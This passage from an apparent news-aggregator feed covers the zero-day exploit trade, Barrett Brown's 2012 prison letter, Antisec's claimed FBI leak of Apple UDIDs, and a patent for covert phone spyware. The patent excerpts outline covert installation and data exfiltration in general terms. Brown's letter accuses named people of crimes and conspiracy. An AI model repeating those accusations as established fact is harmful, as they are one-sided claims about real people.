Intelligence on such weaknesses, and the tools needed to exploit them, now sell for considerable sums. That’s because of what can be achieved with zero-days. As seen with super-virus Stuxnet, which took advantage of four zero-day flaws, weaponised vulnerabilities can have a major real-world impact. In that case, the malware disrupted Iran’s uranium enrichment project by sending centrifuges potty. It was said to have set the process back by two years.

Governments of both east and west, and large private businesses, are thought to be spending vast portions of their budgets on acquiring zero-day exploits. Meanwhile, vendors and users of their wares never learn of them. It’s bad news for Internet security, many argue.

Regardless of their quarrels, a bustling market has emerged, and it is one that has caused ruptures in the security community.

The good old days?

Yet it’s a far cry from what researchers had hoped it would become. Back in 2002, industry experts felt Internet security was in desperate need of a shot in the arm. They thought the best way to get companies and software vendors interested in improving the security of their estates was to make vulnerability hunting a more prosperous activity. They started talking openly about a more formal approach to introducing market incentives for security flaws.

Just after the turn of the Millenium, Jean Camp from Harvard University and Catherine Wolfrom from Berkeley wrote a paper entitled ‘Pricing Security’. In it, they argued that the Internet and “the larger information infrastructure” was awash with easily exploitable flaws. “The only ubiquitous testing of Internet security is done by egocentric hackers,” they said.

Camp and Wolfrom argued that security should be viewed as an “externality”, where if one party is hit, another can be affected either positively or negatively, but without compensation. To counter this, they suggested looking at vulnerabilities as goods, items to be bought and sold. Those who discovered vulnerabilities would effectively own them.

The researchers had a vision of a credit system, where each Internet-connected machine would be given vulnerability credits by a government body. When a machine was compromised by known flaws, the owner of the machine would relinquish their credits, or pay out in cash if they had no credits left. Those who discovered vulnerabilities, whether exploited or not, could “demand some form of payment or validation of credit ownership”. Perhaps because of the somewhat inchoate ideas put forward by Camp and Wolfrom, their vision never became a reality.

At what cost?

But start-ups did emerge in the early 2000s who did treat vulnerabilities as commodities. The most notable one was TippingPoint, which founded the Zero-Day Initiative (ZDI), a program that rewarded researchers for responsibly disclosing vulnerabilities, which were reported to vendors as soon as the flaw was validated. TippingPoint was subsequently bought by HP, but ZDI still operates today, as do many other bug bounty programmes, run by the likes of Google and Facebook.

They offer decent money – usually between $1,000 and $10,000 for each flaw found. Researchers get both monetary and reputational rewards, meaning they fill their pockets and bolster their CV for future consulting gigs.

Yet some believe they can and should make much more money from selling zero-days. Even back in 2002, this publication understands an iTunes vulnerability was sold for $13,000. But now much more is up for grabs.

On the one side, private firms are willing to pay significant fees because they want to gain an advantage over rivals, either by being better protected or by launching attacks themselves. On the other, governments want to buy in preparation for cyber warfare. Now they have seen the damage cyber tools can do, from Stuxnet to the super-sophisticated spy tool Flame, governments know what is at stake.

One industry insider, who preferred to remain anonymous, told TechWeekEurope a single zero-day can sell for anything between $5,000 and $500,000. Often, the higher-cost vulnerabilities can be bought as a package with the tools and services needed to exploit them, the insider added.

“It depends on the quality. They sell for what they are worth,” the source said. “The growing need, coupled with the shrinking availability and the time it takes to find and write, sets the price for exploits. Its just basic supply and demand.”

‘Security for the one percent’

Zero-day merchants take a variety of forms. Major government contractors such as Lockheed Martin, Harris Corporation, Northrop Grumman and Raytheon are thought to be involved, but a host of specialised firms have emerged over the last decade, including Netragard, Errata Security and Vupen. It is the latter group who have been involved in a vituperative war of words with Internet activists and the more vocal members of the security industry.

The main criticism of zero-day sellers is an obvious one. By not sharing their information with the wider community, a flaw is known to a select few, often government bodies and big businesses, whilst the majority go unprotected.

This lack of what is widely-known as “responsible disclosure” is what perturbs many. “It’s security for the one percent and it makes the rest of us less safe,” the Electronic Frontier Foundation said in an essay earlier this year. “These companies are basically selling burglary tools,” claims Professor Ross Anderson, of the University of Cambridge.

When Vupen decided not to tell Google about a zero-day in the Chrome browser, even though it claimed $60,000 in CanSecWest prize money for finding it, it became the bete noire of an industry that had already attracted a lot of bad publicity. Chrome users would be placed at risk, all because one company wanted to keep its handful of customers happy, onlookers moaned.

Even though he said he would only sell to NATO governments and partners, Chaouki Bekrar, CEO of Vupen, told Forbes magazine that he wouldn’t share the information with Google, even for $1 million. “We don’t want to give them any knowledge that can help them in fixing this zero-day exploit or other similar exploits. We want to keep this for our customers.”

Open source troubles?

But there may be an even more pernicious side-effect of the market’s growth. Anderson believes open source projects are now threatened by people wanting to profit from weaknesses.

Researchers are purposefully placing bugs in open source software during the development stages, so that when code appears in completed products, those same researchers can highlight the flaws and profit from them where companies are willing to pay, Anderson has told TechWeekEurope. He claimed to know of several projects where this has happened, but declined to name names.

“That’s now happening. I’ve seen it in the last four months,” Anderson said. Imagine if Linux had flaws purposefully written into it, he ponders. “Intelligence agencies would be willing to pay an extraordinary amount for zero-days for Linux.”

Those against “irresponsible” vulnerability sellers want tighter regulation. Globally, there is little restriction on the practice. Germany, which is known for having strict rules when it comes to data, is one of the only nations to have made it illegal to sell exploits. It’s even illegal there to research zero-day exploits at all.

In the UK, Anderson says he wants more controls over who UK-based zero-day merchants can sell to overseas. He doesn’t want repressive regimes using British technology to carry out mass surveillance on citizens, as has allegedly occurred in the case of Andover-based Gamma International, whose FinSpy tool has appeared tracking dissidents in Syria and Bahrain. Privacy International has threatened the UK government with legal action, if it fails to introduce tighter checks.

Fight night

Now, having been criticised ad infinitum, zero-day hunters are biting back at critics. And at journalists. Is your article going to be another piece of “troll journalism”, Vupen’s CEO asked your reporter, while this article was in progress. He declined to answer any of TechWeekEurope’s questions. Indeed, he has been wary of journalists since that infamous Forbes article.

But others are happy to speak out. When asked about the open source issue, zero-day sellers say they have heard rumours of such subterfuge, but never have they seen it.

When it comes to regulation, they believe they are, at heart, no different from coders. And there shouldn’t be laws stymying the work of coders, they argue. Those calling for legislation, they say, are just jealous, because they don’t have the skills to find the zero-days and subsequently profit from them.

“The recent industry obsession with doting on vulnerability markets is an unproductive campaign with improperly informed champions striving for idealistic, and ultimately useless, regulations,” says Aaron Portnoy, vice president of research and co-founder of Exodus Intelligence. Portnoy was one of the big-shots of the HP TippingPoint ZDI, running it for two years out of the six he was there. The rest of his five-man team is from ZDI too.

His company has a slightly different model to others, selling a feed of data on zero-days and related exploits, and promising to eventually disclose vulnerabilities to vendors for free. It finds vulnerabilities, but also pays external researchers when they hand Exodus their findings. Portnoy might run things differently to the more controversial players in the industry, but he has similarly strong views on those calling for governments to tighten their grip on the market. Security for the one percent? Nonsense, Portnoy says.

“If the ability to sell an exploit suddenly disappeared the Internet would not be a safer place, and individuals would not cease their research into discovering innovative ways to break code,” he told TechWeekEurope. “Those who believe regulation or transparency into this market seem to think otherwise, and that is likely because they themselves aren’t the ones finding the bugs.

“By fixing a single vulnerability, you protect one piece of software from one flaw… by providing enterprises and vendors insight into what attackers are capable of, you enable them to better design their defenses and hopefully develop solutions that are wider in scope.

“If people are concerned about the safety of their Internet, they should stop focusing on trying to stop curious people from being curious.”

Many exploit experts would rather see the software development industry better regulated. They believe vendors should be held more accountable when holes in their software cause harm to Internet users. That’s what Charlie Miller, one of the most noted flaw finders in the world, backs. “Exploits aren’t the problem, vulnerable programs are. Let’s make our devices unbreakable and end the discussion,” he recently tweeted.

Inner turmoil

But whilst zero-day dealers have been lashing out at critics, the market is prone to infighting too. Unlike the traditional security market, where anti-virus vendors at least ostensibly work closely with one another and willingly share threat information, exploit dealers are considerably more antagonistic.

Earlier this month, Bekrar sent a message to Netragard CEO Adriel Desautels, accusing the latter of “trolling” Vupen. “Stop promoting yourself and your s**t by trolling about us, you don’t know a s**t about us nor our customers, teenager,” read one message. “We’re a 100% research compny while u’re just another broker compny without balls to do your own 0Ds,” read another.

Desautels says the argument was over ethics. Netragard offers penetration testing services and claims to do plenty of its own research on the exploit side. It also acts as a broker of exploits, selling other researchers’ work on to the highest bidder.

The company chief tells TechWeekEurope he is far from fond of the Vupen model, in particular its unwillingness to inform vendors. “I couldn’t believe he was talking like that in public,” Desautels says. “Vupen says it won’t sell to a vendor. In my opinion that is both irresponsible and unethical. It’s unethical because if a vendor approaches you willing to pay an exclusive price for a zero-day, it’s the same thing as anyone else willing to pay for a zero-day.

“It’s irresponsible because look at who is in NATO. There are a lot of countries in NATO that don’t like each other.”

Desautels, whilst against regulation of coding, is in favour of tighter rules on brokering, even for a more dirigiste approach. Much like Anderson, he wants to see governments put stronger controls on who brokers sell to. At the same time, however, he does not believe researchers should be limited in who they can sell to.

“Legislation needs to keep its hands out of the research world because if they don’t they are going to drive it towards the black hat world and the underground. It’ll benefit the bad guys,” he adds.

“But there has to be some sort of a body that can keep brokers in check ethically… There has to be some way to control it. It will tick off a lot of the businesses that are doing it, and I understand why, because it means they won’t get easy money anymore.”

Just the beginning

In our Star Wars analogy, few people would argue that Princess Leia and the Rebel Alliance should have practised responsible disclosure and warned the Galactic Empire of the flaw in the Death Star, instead of smuggling the plans out in secret and using them for a destructive attack.

In that case moral issues came into the picture, and the issue of marketing the flaw did not arise. Perhaps that’s because there was no market at all.

Yet in the real world. the growth of the zero-day vulnerability market seems inexorable, despite the mounting criticisms of the market, and the bad etiquette of certain players in it. If researchers can make more by selling to governments and private firms, they will increasingly look at that route before going to vendors.

It doesn’t look like the cost of zero-days has hit a peak either. David Maynor, CTO of Errata Security, certainly doesn’t think so. “Do you think the cost of conventional weapons has hit a peak? We have seen the most someone is willing to pay for a jet fighter?”

And it’s unlikely governments will wrap more red tape around the market. After all, why would they want to mitigate the rise of an industry of which they are the chief beneficiaries?

via TechWeekEurope

Barrett Brown – Communiqué from Prison 9/20/12

Sep 28, 2012 | Anonymous, Government Agenda

It is hard for me to express how much I appreciate your letter, which is the first I have received here, along with the support I’ve reportedly gotten from others so far. Before I forget, let me request that you also send a tweet of support to Jenna, @ElviraXMontana on Twitter; as my girlfriend, she had to watch as the FBI crushed my ribs (which I believe will be healed in time even if I’ve had trouble acquiring medical attention due to me under Geneva; put in formal request for X-ray last night here at Mansfield, whereas last week at Lew Sterrett I was sent to medic by an officer Tamer before being instead re-directed to what is intended as a temporary holding cell for those about to be released on bond, this change of plan being instigated by an officer Roeun (sic?) whom I have since reported to the proper authorities. Despite my having explained her mistake politely twice over the course of the next seven hours, and despite my condition having been serious enough to have prompted other inmates to suggest I check for internal bleeding, I was screamed at and then later simply ordered to lay down, all of which was witnessed by two other inmates, one of whom promised to inform Tim Rogers of D Magazine that I was potentially dying and needed intervention ASAP as soon as he himself was released a few minutes hence (again, this was the temporary outgoing holding cell, not meant for housing inmates for anything longer than an hour or so as their bond is processed; as such, I was not fed, either, much less given my medication, suboxone. Note that none of the treatment I received at Lou Sterrit had anything to do with who I am or what I am accused of, – it is simply the natural result of the inhumane and degenerate mentality found within the Texas “corrections” system, something I first described in a 2005 article for Towards Freedom. It is something we will have to address more firmly over the coming years, just as we have addressed North Africa and the intelligence contracting industry since late 2010. And I note all of this not merely to complain—although to complain is among the few vices I have been left aside from bragging to my fellow inmates – but to illustrate the fundamental problem that so many of us have sacrificed or risked to combat. This problem, which even Richard Nixon recognized and spoke about on that famed evening at the Lincoln Memorial, is that a republic built with the blood of giants has since become a “wild animal.” – one that now feeds upon us all.

I try to avoid metaphors, which can illuminate but in practice are too often used to obscure. Like many aspects of language, the false metaphor kills and enslaves. And at any rate, there will be time to discuss these broader issues later. For now, I must ask you to publish this on pastebin, Anonpaste, piratepad.de, and all other available venues, and that you also send it to some of the journalists that have been kind enough to follow my work as well as the consequences thereof, particularly my friend Michael Hastings, Barry Eisler, Michael Riley (Bloomberg), Ryan Gallagher (Guardian), and Josh at Daily Caller (forgot his last name) – plus the former editor of The Yemen Times who’s now at Global Times or some such and who, along with a certain Washington Times correspondent known to Gregg Housh, plus one or two others that I know of, who are now looking into Romas/COIN due in part to my release of the NYT e-mails earlier this month. Along with others in both the mainstream and independent media, these are most likely to report accurately on this matter. Having been mischaracterized at least a hundred times by “professional” journalists since I first appeared on Fox News in January 2009 to denounce Obama’s association with the goofy fascist Rick Warren – and was introduced as being spokesman for the non-existent “American Atheist Society” rather than GAMPAC. This would be a good time to note, particularly for the benefit of certain journalists, that I am not and never have been the spokesman for Anonymous, nor its “public face” or, worse, “self-proclaimed” “face” or “spokesperson” or “leader” (as the CIA-funded Radio Free Europe called me last year when I felt compelled to “quit” the non-group that I’d never technically joined in the first place, but rather gradually attached myself to as Wikileaks and Tunisia went down in December of 2010). Anyone who cares to learn what happens to a person who decides to help deal with such issues at the request and with the knowledge of active Anons can search my name in conjunction with those terms, and then see the article “Barrett Brown is Anonymous” from April 2011 in which I explain clearly, as I have countless times since, that no one has the authority to designate me as such. It is known to some of those who worked out of Anonops or were otherwise particularly active in the beginning of 2011 that I wrote or edited a number of the press releases of that time, and that the al-Jazeera article written in the first few days of January and which appeared later that month under the title “Anonymous and the Global Correction” was also my work – something I revealed privately to the brilliant cyberpunk essayist Bruce Sterling after he openly speculated as to the author’s background in Wired, noting the sentiments to be that of a true revolutionary. Among those who now agree with him are the FBI, which has since responded accordingly – and unethically.

Contrary to the countless claims to the effect that I hold some official role in Anonymous, I can think of only one occasion in which any Anon has come close to actually deeming me as such, that being the day on which HBGary was hacked in retaliation for HBGary Federal CEO Aaron Baar’s claim – shown to be entirely false – that he had identified Anon’s “lieutenants” and “co-founder” and that he had been contacted by the FBI about this. In fact, he had conflated three different people including a professional gardener and, as shown in the notes Anon released along with the e-mails taken from HBGary Federal, had made a huge number of additional mistakes – something since confirmed by everyone concerned including Barr himself. (That the Financial Times writer who had bought Barr’s self-promotion would again essay to write about Anonymous months later, this time taking the claims of a Dutch kid at face value in the course of “reporting” various negative things about how the movement operates, is only one of numerous bizarre and depressing twists to this story; I myself would later encounter him on Canada television as a panelist during a discussion in which he accused Anon of being particularly anti-“American interest”, to which I responded that it is difficult to avoid stepping on the empire’s toes when one assists North Africans in fighting off dictatorships that the US has supported for years.) (Oh snap!) On that day, as recorded on pastebin from the discussion on the #OPHBGary channel at Anonops, I was referred to in passing as “our public face” to a journalist. I was on the phone to HBGary President Penny Hoglund at the time, apologizing that HBGary’s e-mails had been seized by Sabu in addition to HBGary Federal’s, instructing her on how to get on IRC in order to make her case directly to the hackers, and promising to remove the link I had put up to the 70,000 e-mails acquired in the operation, a link I had placed upon a Daily Kos post put up to explain the situation to the great many who would miss the “makeover” done to HBGary.com. Had I known that Penny was lying to me about what she and husband Greg Hoglund had known about Barr’s irresponsible attempt to save his own career at the expense of the innocent and heroic alike, I would have simply hung up. Instead, I was polite – but I recorded the call, just as I recorded the next call with Barr, the next call with HBGary exec Jim Butterworth, and finally the drunken call I received months later from Greg Hoglund himself. “Trust but verify,” as Reagan said in the context of a different set of villains.

With the exception of the ten minute convo I released between myself and Aaron Barr, all of the other recordings – and plenty of others – are in the possession of the FBI, which raided my apartment as well as my mother’s home on March 6th. For more on those events, as well as the criminal conspiracy to which I have been subjected by elements of the FBI, HBGary, and paid informant/contractor Jennifer Emick (among other parties both known and undiscovered), please see the last 3 videos I uploaded to my YouTube account, as well as documents I linked to on my Twitter account @BarrettBrownLOL in the final days before my most recent (and dramatic!) arrest. Not everything is released; I was interrupted by armed, mediocre federal agents and DPD officers (“No complicity in assassination of a chief executive since 1963!”) before I could finish making my case, which was to be done over several days before the entirety would be sent to the FBI and the judge who signed my March search warrant. This was to be followed by the instigation of a civil suit against HBGary and other parties to be named in the next 2 months. My plan has been disrupted – plans often are, as history tells us – but it has not been rendered obsolete. It will evolve, just as ProjectPM itself has evolved steadily since 2009, when this war became evident to me, when I first realized that my future as a political satirist would have to be abandoned in favor of this dirty, grueling struggle.
But why was I arrested this time? I would love to tell you. But the prosecution wouldn’t like that. I, and everyone else in the court room, were ordered to refrain from discussing the complaint, affidavits, and warrant, all of which are sealed at the request of the author, one FBI special agent whom I shall not name lest I give him cause for fright (or pretend fright – I am allegedly a danger to one especially skittish special agent whom I shall be careful not to name again until such time as I am prepared to list him in the civil suit I’ve been preparing for weeks now). Frankly, I do not blame this other special agent for requesting that the document be sealed – if I had written something of such low quality and demonstrable untruth, I would burn it and ask forgiveness of every deity invented by man and the higher apes/dolphins/whales. Likewise, if I were the US attorney who signed the Motion for Detention dated September 13 2012 – the document that, after having been approved by Judge Paul D. Stickney, ensured I would not only be prevented from discussing what I’m being accused of but also made a prisoner of the state until such time as a trial or some such can be concocted out of the jurisprudential magick I struggle to follow, in my innocence. Apparently I am not just a danger to the fragile FBI agents who have taken to threatening my mother and fracturing my ribs in the course of heavily-armed raids on my uptown Dallas apartment, but must be prevented from explaining to my associates, followers, and even enemies why I have again been subjected to violence and indignity.

I explained the first raid against me (March 6th, 6:30 a.m. CST) and the second against my mother (about six hours later) in several pastebin messages at that time. It was not until 2 months ago that I learned how a judge had been tricked into permitting this raid on me – how the disgraced contracting firm HBGary hired the paid FBI informant Jennifer Emick to, in their words, “find something to get [me] picked up on,” even as this bizarre former Anon made public accusations against me under both her real name and her adopted contractor persona: “FakeGreggHoush” on Twitter (now “AsherahResearch”) and Asherah on IRC – particularly the 2600 server where she frequented the #jester channel alongside various ex-military men and current “security’ contractors who all found themselves inclined to associate with the admitted criminal hacker th3J35T3R, one of several parties who have taken credit for DoS attacks on Wikileaks. I should not have to remind anyone that 40 U.S. homes were raided in January 2011 due to a similar but less effective series of DDoS attacks on Visa, MasterCard, PayPal, and Amazon which were clearly an act of protest against an unprecedented economic blockade ordered by the U.S. regime. 14 of the “criminals” in question are being charged such that they face up to 15 years in prison. Thanks largely to Jay Leiderman the California attorney and John Penley the NYC activist and veteran, many of them are being represented for free. Likewise, I will seek and accept only pro bono assistance from this point on, though with the stipulation that I will pay any such lawyers what I can from the defense funds that have been set up for me thus far by well-wishers. As of this writing I dismiss Tom Mills, whom I retained for $3,500 after receiving bad advice from a well-meaning person. I will also expect that money returned within 60 days of the publication of this missive online (ProjectPM participants, please ensure that he receives this message, which I have also delivered through my mother – whom he falsely claimed to be representing on the matter of the FBI threats against her despite having been paid by me, not her). And as I had noted both publicly and privately earlier this month, I am still seeking additional attorneys with skill in civil litigation to pursue at least two suits I’ll be filing by the end of the year. Those interested may write to me at my new home, Some Jail in Texas. I am able to arrange for phone conversations with any applicants (or anyone else who is either especially interesting or who is able to accept a collect call or contribute $5 to my commissary/phone fund, that being the cost of a 15-minute call instigated by me). Anyone who writes me without us having been formerly introduced, I will guarantee a response if you send self-addressed stamped envelope. Also I believe that only mail with a return address will be delivered to me, though I’m not sure.

I hate that I have spent so much time in conflict over the past two years, and that so much of this has involved my fellow American citizens rather than the Middle Eastern dictators that I got involved in this to combat. I feel sorrow at the lost opportunities, and as for the way it has changed me as a person… I like to think that I am wiser and less naïve than I was, but I know too well how foolish and unsophisticated I was to begin with. I cannot excuse the mistakes I myself have made on both the strategic and tactical levels in my short career. I shudder when I look back on some of the things I wrote or said when I got my first real taste of power at the dawn of 2011, and I continue to bring shame upon myself and upon my family and work by some of the things I say even lately. In particular I have made comments about the U.S. military that I do not mean and which are obviously not entirely accurate. Along with other nonsense I have said, felt, written throughout my life, many of these things originate from my own fears and weaknesses. I am humiliated at not being able to protect my own mother from the FBI, or to shield my own girlfriend from watching heavily-armed men step on my spine as I scream in pain. I cannot forget how my mom cried on March 6th after the FBI had left with my equipment and hers, and how she whispered through tears that she wanted to be able to protect me from prison but couldn’t; I will never forget the look on Jenna’s face as the federal thugs swept through my efficiency apartment with guns drawn and safeties off, in search of hidden assailants and non-existent weapons. That these things are unjust and increasingly insane does not change the fact that they are the result of my own behavior, my own miscalculations, my own choices.

Having said that, I regret nothing. For the last week I was denied opiates and thus forced to feel not just rage, hatred, all the primal things, but forced to endure them while sicker than most humans can imagine and in a jail that is overcrowded and filled with common criminals. I have gained something extraordinary in that process, which ended this morning when I was given the first of 30 days of suboxone. I will personally thank everyone on the outside who has helped me and this movement particularly at this critical time, when I have regained the freedom that I did nothing to lose. For now, and until that time, it is war, on paper as always, but war.

Barrett Brown
Founder
ProjectPM
Prisoner #35047177
Mansfield Law Enforcement Center
1601 Heritage Parkway
Mansfield, TX 76063

Postscript-
[redacted], if you are able to relay this message to the Anons, my ProjectPM people, journalists, etc, you will have done me a finer deed than most men ever have occasion to do for another. I am transmitting a copy of this to another individual to ensure that the FBI does not manage to silence me on this (incidentally, the local jail here in Mansfield has proven to be run by honorable, trustworthy, even friendly people, but it is nonetheless subject to the Yankee boot (no offense)). Tell journalists, etc that they may contact [redacted]. My future and that of ProjectPM depends on you and a handful of others. Thank you for your loyalty at this time. Finally, please include this PS when forwarding and ask people to see my original search warrant as published on Buzzfeed a few months back. Echelon2.org is part of the key to this affair, but not all. More to be revealed when all is prepared. Good luck to you.

Anonymous Hackers Claim To Release One Million Apple Devices’ Unique Identifiers Stolen From FBI

Sep 4, 2012 | Anonymous, Leaks, News

Anonymous has a way of releasing massive collections of information that raise many more questions than they answer.

Case in point: On Monday night, the segment of the hacker group that calls itself Antisec announced that it had dumped 1,000,001 unique device identifier numbers or UDIDs for Apple devices–the fingerprints that Apple, apps and ad networks use to identify the iPhone and iPads of individual users–that it claims to have stolen from the FBI. In a long statement posted with links to the data on the upload site Pastebin, the hackers said they had taken the Apple data from a much larger database of more than 12 million users’ personal information stored on an FBI computer.

While there’s no easy way to confirm the authenticity or the source of the released data, I downloaded the encrypted file and decrypted it, and it does seem to be an enormous list of 40-character strings made up of numbers and the letters A through F, just like Apple UDIDs. Each string is accompanied by a longer collection of characters that Anonymous says is an Apple Push Notification token and what appears to be a username and an indication as to whether the UDID is attached to an iPad, iPhone or iPod touch.

In their message, posted initially in the Anonymous twitter feed AnonymousIRC, the hackers say they used a vulnerability in Java to access the data on an FBI Dell laptop in March of this year. They say the database included not only the UDIDs, but also “user names, name of device, type of device, Apple Push Notification Service tokens, zipcodes, cellphone numbers, addresses, etc.” Anonymous claims that the amount of data about each users was highly variable, and that it only released enough data to the public “to help a significant amount of users to look if their device are listed there or not.”

The Antisec statement also took the opportunity to mock the recent appearance of NSA Director and General Keith Alexander at the hacker conference Defcon, where he made a recruiting pitch to attendees. “It was an amusing hypocritical attempt made by the system to flatter hackers into becoming tools for the state,” Anonymous’ statement reads. “We decided we’d help out Internet security by auditing FBI first.”

If the UDIDs are determined to be real, just what that means about law enforcement and Apple users’ privacy isn’t entirely clear. Much more than passwords or even email addresses, UDIDs are already spread around the Internet by app developers and advertisers–a study by one privacy researcher in 2011 found that 74% of the apps he tested sent a user’s UDID to a remote server. But the same researcher also found that five out of seven social gaming networks he tested allowed users to log in with only their UDID, making a stolen UDID equivalent to a stolen password.

“We never liked the concept of UDIDs since the beginning indeed,” reads the Anonymous statement. “Really bad decision from Apple. Fishy thingie.”

Due perhaps to the privacy concerns around UDIDs’ proliferation, Apple stopped allowing new iOS apps to track UDIDs earlier this year.

Regardless, if the FBI has in fact collected 12 million Apple UDIDs–or even just one million–it will have some explaining to do to privacy advocates. In its release, Anonymous argues that the massive dump of users’ personal information, which it says has been stripped of many of the most identifying details, is designed raise awareness of the FBI’s alleged gadget-tracking shenanigans. “…We will probably see their damage control teams going hard lobbying media with bullshits to discredit this,” the statement reads at one point. “But well, whatever, at least we tried and eventually, looking at the massive number of devices concerned, someone should care about it.”

For now, Anonymous refuses to answer more questions about its release–at least from the press. Before granting any interviews, it’s demanding that Gawker writer Adrian Chen, who has been especially critical of Anonymous, appears on Gawker’s home page in a “huge picture of him dressing a ballet tutu and shoe on the head.”

SOURCE: Forbes.com

PRIVACY SOS: Remote Monitoring & Access, Spy Tech Secretly Embeds Itself In Phones

Aug 23, 2012 | Black Technology, News

In 2008, a Reston, VA based corporation called Oceans’ Edge, Inc. applied for a patent. On March, 2012 the company’s application for an advanced mobile snooping technology suite was approved.

The patent describes a Trojan-like program that can be secretly installed on mobile phones, allowing the attacker to monitor and record all communications incoming and outgoing, as well as manipulate the phone itself. Oceans’ Edge says that the tool is particularly useful because it allows law enforcement and corporations to work around mobile phone providers when they want to surveil someone’s phone and data activity. Instead of asking AT&T for a tap, in other words, the tool embeds itself inside your phone, turning your device against you.

A former employee of Oceans’ Edge notes on his LinkedIn page that the company’s clients included the FBI, Drug Enforcement Agency, and other law enforcement.

Oddly enough, Oceans’ Edge, Inc. describes itself as an information security company on its sparsely populated website. The “About Us” page reads:

Oceans Edge Inc. (OE) is an engineering company founded in 2006 by wireless experts to design, build, deploy, and integrate Wireless Cyber Solutions.

Our team is composed of subject matter experts in the following areas:

Wireless Cyber Security

Mobile Application Development

Wireless Communication Protocols

Wireless Network Implementation

Lawful Intercept Technology

With this expertise, we deliver engineering services and wireless technology solutions in critical mission areas for our government and commercial customers.

But while the company may offer “cyber security” solutions to government and corporations, as the website claims, the firm only has one approved patent on file with the US Patent and Trademark Office.

Remote mobile spying

The patent is for a “Mobile device monitoring and control system.” The applicants summarize the technology thusly:

Methods and apparatus, including computer program products, for surreptitiously installing, monitoring, and operating software on a remote computer controlled wireless communication device are described.

In other words, the technology works to snoop on mobile phones by secretly installing itself on phone hardware. The targeted phone is thus compromised in two ways: first, the attacker can spy on all the contents of the phone; and second, the attacker can operate the phone from afar. That’s to say, it doesn’t just let the attacker read your text messages. It also potentially lets him write them.

The summary goes on:

One aspect includes a control system for communicating programming instructions and exchanging data with the remote computer controlled wireless communication device. The control system is configured to provide at least one element selected from the group consisting of: a computer implemented device controller; a module repository in electronic communication with the device controller; a control service in electronic communication with the device controller; an exfiltration data service in electronic communication with the device controller configured to receive, store, and manage data obtained surreptitiously from the remote computer controlled wireless communication device; a listen-only recording service in electronic communication with the device controller; and a WAP gateway in electronic communication with the remote computer controlled wireless communication device.

The technology therefore also enables automated data storage of all of a phone’s activity in the attacker’s database. So if someone used this technology to spy on your phone, they would be able to use the Oceans’ Edge product to automatically store everything you do on it, to go back to later.

In case you aren’t sure who would want this kind of spook technology or why, Oceans’ Edge explains in the patent application:

A user’s employment of a mobile device, and the data stored within a mobile device, is often of interest to individuals and entities that desire to monitor and/or record the activities of a user or a mobile device. Some examples of such individuals and entities include law enforcement, corporate compliance officers, and security-related organizations. As more and more users use wireless and mobile devices, the need to monitor the usage of these devices grows as well. Monitoring a mobile device includes the collection of performance metrics, recording of keystrokes, data, files, and communications (e.g. voice, SMS (Short Message Service), network), collectively called herein “monitoring results“, in which the mobile device participates.

The application goes on to explain that the tool is beneficial to law enforcement or other customers because it allows them to avoid dealing with pesky mobile phone providers when they want to covertly spy on people’s mobile communications. Instead of the FBI going to AT&T or T-Mobile to get access to your cell data, they can just surreptitiously install this bug on your phone. They’ll get all your data — and your phone company might never know.

Mobile device monitoring can be performed using “over the air” (OTA) at the service provider, either stand-alone or by using a software agent in conjunction with network hardware such a telephone switch. Alternatively, mobile devices can be monitored by using a stand-alone agent on the device that communicates with external servers and applications. In some cases, mobile device monitoring can be performed with the full knowledge and cooperation of one of a plurality of mobile device users, the mobile device owner, and the wireless service provider. In other cases, the mobile device user or service provider may not be aware of the monitoring. In these cases, a monitoring application or software agent that monitors a mobile device can be manually installed on a mobile device to collect information about the operation of the mobile device and make said information available for later use. In some cases, this information is stored on the mobile device until it is manually accessed and retrieved. In other cases, the monitoring application delivers the information to a server or network device. In these cases, the installation, information collection, and retrieval of collected information are not performed covertly (i.e. without the knowledge of the party or parties with respect to whom the monitoring, data collection, or control, or any combination thereof, is desired, such as, but not limited to, the device user, the device owner, or the service provider). The use of “signing certificates” to authenticate software prior to installation can make covert installation of monitoring applications problematic. When software is not signed by a trusted authority, the software may not be installed, or the device user may be prompted for permission to install the software. In either case, the monitoring application is not installed covertly as required. Additionally, inspection of the mobile device can detect such a monitoring application and the monitoring application may be disabled by the device user. Alternatively, OTA message traffic may be captured using network hardware such as the telephone switch provided by a service provider. This requires explicit cooperation by the service provider, and provides covert monitoring that is limited to message information passed over the air. As a result, service provider-based monitoring schemes require expensive monitoring equipment, cooperation from the service provider, and are limited as to the types of information they can monitor.

The applicants describe some of the challenges they had to overcome, which include:

Additional challenges are present when the monitoring results are transmitted from a mobile device. First, many mobile devices are not configured to transmit and receive large amounts of information. In some instances, this is because the mobile device user has not subscribed to an appropriate data service from an information provider. In other instances, the mobile device has limited capabilities.

In other words, make sure you get that unlimited data plan, or else it’ll be really hard for the FBI to spy on your mobile phone! It’ll take up so much of your data usage that you’ll notice and maybe even complain to your mobile provider! That would be awkward.

Second, transmitting information often provides indications of mobile device activity (e.g. in the form of activity lights, battery usage, performance degradation).

Bad battery performance that the geeks at the Apple genius bar can’t explain? Maybe your device has been compromised.

Third, transmitting information wirelessly requires operation in areas of intermittent signal, with automated restart and retransmission of monitoring results if and when a signal becomes available.

The monitoring program has got to be clever enough to stop and restart every time you go out of range of your cell network, or you turn the phone off.

Fourth, many mobile devices are “pay as you go” or have detailed billing enabled at the service provider. The transmission of monitoring results can quickly use all the credit available on a pre-paid wireless plan, or result in detailed service records describing the transmission on a wireless customer’s billing statement.

When the snoops steal your information, you might have to pay for the pleasure of being spied on. That’s because your mobile phone provider might read the spying activity as your activity. After all, it’s coming from your phone.

Lastly, stored monitoring results can take up significant storage on a mobile device and the stored materials and the use of this storage can be observed by the device user.

Is there a large chunk of space on your phone that seems full, but you can’t figure out why? Perhaps a snoop tool like that devised by Oceans’ Edge, Inc. is storing data on your phone that it plans to later capture.

Given all of those potential problems, the technologists had a lot of work cut out for them. Here’s how they addressed those problems:

From the foregoing, it will be appreciated that effective covert monitoring of a mobile device requires the combination of several technologies and techniques that hide, disguise, or otherwise mask at least one aspect of the monitoring processes: the covert identification of the mobile devices to be monitored, the covert installation and control of the monitoring applications, and the covert exfiltration of collected monitoring results. As used herein, “covert exfiltration” refers to a process of moving collected monitoring results from a mobile device while it is under the control of another without their knowledge or awareness. Thus covert exfiltration processes can be those using stealth, surprise, covert, or clandestine means to relay monitoring data. “Collected monitoring results” as used herein includes any or all materials returned from a monitored mobile device to other devices, using either mobile or fixed points-of-presence. Examples of collected monitoring results include one or more of the following: command results, call information and call details, including captured voice, images, message traffic (e.g. text messaging, SMS, email), and related items such as files, documents and materials stored on the monitored mobile device. These materials may include pictures, video clips, PIM information (e.g. calendar, task list, address and telephone book), other application information such as browsing history, and device status information (e.g. device presence, cell towers/wireless 